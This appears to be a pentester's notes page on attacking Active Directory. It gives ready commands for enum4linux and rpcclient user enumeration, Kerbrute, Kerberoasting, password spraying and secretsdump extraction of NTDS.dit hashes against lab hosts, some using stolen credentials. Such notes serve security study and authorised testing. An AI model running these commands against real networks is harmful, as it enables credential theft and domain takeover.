Active Directory

Attack Workflow

Determine what ports are open

Enumerate with

• Determine open ports

  • Scan ports with Nmap to fingerprint

• Enumerate AD information

  • Domain info

  • rpcclient

  • enum4linux

• Get list of users

  • If list not available, bruteforce usernames

  • Determine if kerberos pre-auth exists

  • Determine which users have SPNs (Service Principle Names)

enum4linux

Used to enumerate a huge amount of AD information from the command line.

enum4linux -a 10.1.1.10        # Attempts to enumerate everything at target
enum4linux -u administrator -p password -U 10.1.1.10    # Use stolen creds to enumerate all users
enum4linux -S 10.1.1.10        # Attempt to gather SMB shares

rpcclient

Used to enumerate information about system over RPC

Gather a list of accounts with rpcclient and save

rpcclient -U 'GOBLINS\printerldap%SecurePassword1' 10.0.0.1 -c 'enumdomusers;exit' | awk -F '[' '{print $2}' | awk -F ']' '{print $1}' > goblinUsers.txt

Password Spraying

Using a tool such as Talon can run password spray attacks across an AD env

Kerberos

Kerbrute, used to run various kerberos attacks. Written in Go. https://github.com/ropnop/kerbrute

./kerbrute_linux_amd64 userenum --dc 10.10.107.154 -d spookysec.local ../userlist.txt

Kerberoasting

Using a valid account on a pwned box, we can gather tickets for service accounts and extract the hash to crack. We must find all accounts in AD which have a SPN (Service Principle Name), then request RC4 tickets from the DC.

secretsdump

Used to extract hashes from a server. Below command will get NTDS.dit, assuming that you have an account with those permissions.

impacket-secretsdump -just-dc backup:backup2517860@10.10.107.154

https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2022_11.svg